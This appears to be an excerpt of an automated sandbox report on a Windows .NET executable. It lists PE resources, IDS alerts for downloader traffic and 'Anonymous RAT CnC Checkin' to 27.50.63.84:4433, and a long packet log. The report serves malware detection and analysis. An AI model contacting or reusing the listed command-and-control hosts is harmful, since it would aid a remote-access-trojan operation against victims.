.reloc | 0x30000 | 0xc | 0x200 | 58f52b132646d788c802f87fabf5007c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x28238 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.21321961620469082
RT_ICON | 0x290e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.3953068592057762
RT_ICON | 0x29988 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.4479768786127168
RT_ICON | 0x29ef0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.09948132780082987
RT_ICON | 0x2c498 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.12593808630393996
RT_ICON | 0x2d540 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.19680851063829788
RT_GROUP_ICON | 0x2d9a8 | 0x5a | data | | | 0.7
RT_VERSION | 0x2da04 | 0x24c | data | Chinese | China | 0.5153061224489796
RT_MANIFEST | 0x2dc50 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
RT_MANIFEST | 0x2de3c | 0x105d | exported SGML document, ASCII text | English | United States | 0.2174743375507281
DLL | Import
mscoree.dll | _CorExeMain
Language of compilation system | Country where language is spoken
Chinese | China
English | United States
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-18T13:05:50.566344+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497143.5.237.31443TCP
                                                                                              2024-12-18T13:05:54.492005+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497153.5.238.183443TCP
                                                                                              2024-12-18T13:05:58.604327+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497223.5.238.183443TCP
                                                                                              2024-12-18T13:06:01.843523+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497313.5.239.146443TCP
                                                                                              2024-12-18T13:06:04.720219+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497433.5.239.146443TCP
                                                                                              2024-12-18T13:06:09.012883+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54974952.95.161.33443TCP
                                                                                              2024-12-18T13:06:30.366027+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.54979427.50.63.84433TCP
                                                                                              2024-12-18T13:07:44.715735+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.54979427.50.63.84433TCP
                                                                                              2024-12-18T13:08:49.924265+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.55001227.50.63.84433TCP
                                                                                              Dec 18, 2024 13:05:43.920764923 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920813084 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.920838118 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920852900 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920860052 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.920900106 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.920909882 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920969009 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.942065001 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.942091942 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.942198038 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.942224026 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.942352057 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.944983006 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.984819889 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.984827042 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.984973907 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.985003948 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005016088 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005028009 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005067110 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005078077 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005155087 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.005203009 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005223989 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.040209055 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040255070 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040261984 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040323019 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.040369987 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040376902 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040393114 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.040442944 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.055200100 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055210114 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055239916 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055330992 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055331945 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.055366993 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055383921 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.055383921 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.091948986 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.091969967 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.092135906 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.092185974 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.105691910 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.105706930 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.105743885 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.105819941 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.105843067 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.105881929 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.119529009 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.119571924 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.119577885 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.119631052 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.119654894 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.119673967 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.133939981 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.134004116 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.134048939 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.134059906 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.134068012 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.174907923 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.174923897 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.176211119 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.176244020 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.176249981 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.176285982 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.176333904 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.176342964 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.176351070 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.176392078 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.177361965 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.177437067 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.217096090 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.217123032 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.217355967 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.217387915 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.217453003 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.218256950 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.226541042 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.226566076 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.226675987 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.226691961 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.268780947 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.268805981 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.274704933 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.274741888 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.274775028 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.274916887 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.274929047 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.275028944 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.275648117 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.275722980 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.282649994 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.282680035 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.282788038 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.282790899 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.282799006 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.282851934 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.289751053 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.289767027 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.289917946 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.289925098 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.318413019 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.318470001 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.318552017 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.318561077 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.318594933 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.362447023 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.362488985 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.363570929 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.363631010 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.363639116 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.363653898 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.363673925 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.363682985 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.363698959 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.363728046 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.363908052 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.363954067 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.370999098 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.371017933 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.371120930 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.371128082 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.371134996 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.371187925 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.412260056 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.412296057 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.412365913 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.412396908 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.412417889 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.419950008 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.419987917 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.420064926 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.420070887 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.420085907 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.420120001 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.420140028 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.470930099 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.470943928 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.470976114 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.471039057 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.471081972 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.471095085 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.477597952 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.477649927 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.477719069 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.477732897 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.477771044 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.484211922 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.484242916 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.484291077 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.484308004 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.484313965 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.514692068 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.514718056 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.514935017 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.514954090 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.558655977 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.558682919 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.558779001 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.558798075 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.601457119 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.601468086 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.601506948 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.601521015 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.601545095 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.601583958 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.601588011 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.601634979 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.608135939 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.608145952 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.608195066 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.608242989 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.608252048 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.517730951 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.517734051 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.517777920 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.523303032 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.523369074 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.523377895 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.523401022 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.523427010 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.523447037 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.524113894 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.565514088 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.566373110 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.566382885 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.566447973 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.566461086 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.566523075 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.567181110 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.573070049 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.573116064 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.573169947 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.573188066 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.573200941 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.623280048 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.623353958 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.623406887 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.623450041 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.623481035 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.630034924 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.630095005 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.630103111 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.630108118 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.630145073 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.630166054 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.636357069 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.636408091 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.636435986 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.636445045 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.636480093 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.666361094 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.666397095 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.666439056 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.666461945 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.666498899 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.706130028 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.706146002 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.712287903 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.712342978 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.712347984 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.712366104 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.712383032 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.712405920 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.712434053 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.753029108 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.764257908 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764271021 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764327049 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.764333963 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764344931 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764379025 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.764389992 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764408112 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.764828920 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764854908 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764884949 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.764897108 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764899969 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.764921904 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.764947891 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.812099934 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.812113047 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.812196970 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.812252998 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.819427013 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.819469929 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.819513083 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.819535971 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.819567919 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.825972080 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.826014042 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.826049089 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.826081038 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.826118946 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.826148033 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.832477093 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.832499027 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.832614899 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.832650900 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.832725048 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.856175900 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.901496887 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.901515961 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.901587963 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.901609898 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.907529116 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.907607079 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.907624006 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.907716990 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.908250093 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.908334017 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.951105118 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.951129913 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.951222897 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.951246023 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.951340914 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.951929092 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.957681894 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.957698107 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:45.957760096 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:45.957778931 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.003026962 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.003082991 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.007297993 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.007328987 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.007431984 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.007736921 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.007736921 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.007736921 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.007752895 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.013789892 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.013834000 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.013881922 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.013904095 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.013921976 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.021104097 CET443497103.5.237.31192.168.2.5
